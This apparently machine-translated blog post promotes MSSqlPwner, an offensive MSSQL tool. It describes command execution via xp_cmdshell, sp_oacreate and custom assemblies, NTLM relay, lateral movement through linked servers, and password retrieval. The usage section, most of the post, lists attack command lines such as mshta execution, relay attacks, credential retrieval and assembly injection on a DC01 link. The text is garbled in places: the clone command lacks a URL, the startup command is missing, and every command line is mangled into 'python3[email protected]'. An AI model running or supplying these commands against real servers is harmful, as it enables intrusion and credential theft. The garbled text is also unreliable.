Notice: Welcome To Explore Information Website
Home Blog MSSqlPwner: a powerful MSSQL security testing and evaluation tool

MSSqlPwner: a powerful MSSQL security testing and evaluation tool

by Technical otaku - 2023-10-04 2077 0 2

About MSSqlPwner

MSSqlPwner is a powerful MSSQL security testing and evaluation tool that is based on Impacket for its functionality and is a general purpose testing tool designed to help a wide range of researchers interact seamlessly with MSSQL servers and perform comprehensive security testing and security evaluation of MSSQL environments.

Tool Features

1, MSSqlPwner allows users to execute custom commands through a variety of methods, including custom assemblies, xp_cmdshell and sp_oacreate (Ole Automation Procedures);

2, the tool can perform recursive enumeration tasks from the linked server and collect all possible chains;

3, MSSqlPwner tool can be used to utilize xp_dirtree, xp_subdirs, xp_filexist and command execution to achieve NTLM relay function;

4, the tool can provide opportunities for lateral movement assessment and utilization of linked servers;

5, if the authenticated MSSQL user does not have permission to perform certain operations, the tool can find the chain that may allow the execution. For example, it can send a query to a linked server, which in turn returns links to authenticated MSSQL services with higher privileges;

6. The tool also supports recursive queries over links to execute queries and commands from inaccessible linked servers pointed to by vulnerable MSSQL services;

Lateral movement and linked server utilization

MSSqlPwner provides the opportunity to move laterally to evaluate and explore linked servers. In cases where the current session lacks administrative privileges, the tool tries to find a chain that escalates its own privileges through the linked server. If the session on the linked server has higher privileges, the tool can interact with the linked server and execute a link query back to the host with elevated privileges, thus enabling a lateral move to the target server.

Authentication methods

The current version of MSSqlPwner supports several authentication methods, including:

1, WIndows credentials;

2, MSSQL credentials;

3, Kerberos authentication;

4, Kerberos token tickets;

5, NTLM hash;

The tool is suitable for verifying the effectiveness of authentication mechanisms in a variety of scenarios and environments.

With the power and versatility of MSSqlPwner, the security assessment of MSSQL environments can be effectively upgraded and new possibilities for exploring lateral movement, stealthy querying, and accurate security assessment are opened up

Tool Installation

Since the tool is developed based on Python 3, we first need to install and configure the Python 3 environment on the local device.

Next, researchers at large can clone the project's source code locally using the following command

git clone git clone

Then switch to the project directory and use the pip3 command and the requirements.txt file provided with the project to install the other dependencies required by the tool:

cd MSSqlPwner

pip3 install -r requirements.txt

At this point, we can directly execute the tool's startup script using the following command:


Tool Use

Tool Interaction Mode:

python3[email protected] -windows-auth interactive

Execute a custom assembler on the current server using windows authentication and execute the hostname command:

python3[email protected] -windows-auth custom-asm hostname

Execute a custom assembler on the current server using windows authentication and execute the hostname command on the SRV01 linked server:

python3[email protected] -windows-auth -link-name SRV01 custom-asm hostname

Enable execution of the hostname command on the linked SRV01 server:

python3[email protected] -windows-auth -link-name SRV01 exec hostname

Use the sp_oacreate method to execute the hostname command on the linked SRV01 server:

python3[email protected] -windows-auth -link-name SRV01 exec "cmd /c mshta" -command-execution-method sp_oacreate

Launching NTLM relay attack on SRV01 server:

python3[email protected] -windows-auth -link-name SRV01 ntlm-relay

NTLM relay attack against chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25:

python3[email protected] -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay

NTLM Relay Attack on Local Server Mountain Using Custom Commands:

python3[email protected] -windows-auth ntlm-relay

Execute direct queries:

python3[email protected] -windows-auth direct_query "SELECT CURRENT_USER"

Retrieve password from linked server DC01:

python3[email protected] -windows-auth -link-server DC01 retrive-password

Code execution using custom assembler on link server DC01:

python3[email protected] -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll

Sample Tool Usage

Project Address

MSSqlPwner:【GitHub Portal




Leave a Comment

Your email address will not be published. Required fields are marked *